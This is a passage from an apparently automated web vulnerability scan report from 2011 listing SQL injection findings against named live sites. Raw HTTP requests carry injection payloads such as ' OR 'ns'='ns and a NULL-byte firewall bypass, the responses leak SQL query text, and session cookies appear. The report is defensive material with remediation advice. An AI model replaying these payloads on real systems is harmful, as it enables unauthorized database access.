
Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:35:33 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 85939

UNOUNO.namespace("global");UNOUNO.global.Functions={getElementsByClassName:function(clsName,element){var retVal=[];var elements;if(element){elements=element.getElementsByTagName("*");}else{elements=do
...[SNIP]...

1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:34:37 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 302658

if(typeof UNOUNO=="undefined"){var UNOUNO={};}if(typeof UNOUNO.namespace=="undefined"){UNOUNO.namespace=function(){var a=arguments,o=null,i,j,d;for(i=0;i<a.length;++i){d=a[i].split(".");o=UNOUNO;for(j
...[SNIP]...

1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadfl' at line 5

Request 2

GET /ppc/leadflow''/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadfl' at line 5

Request 2

GET /ppc/leadflow/hins00''/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow'/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow''/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00'/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00''/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php'?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php''?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns'&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns''&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.0 404 Not Found
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/leadflow/hins00/project.php was not found on this server.</p>

1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
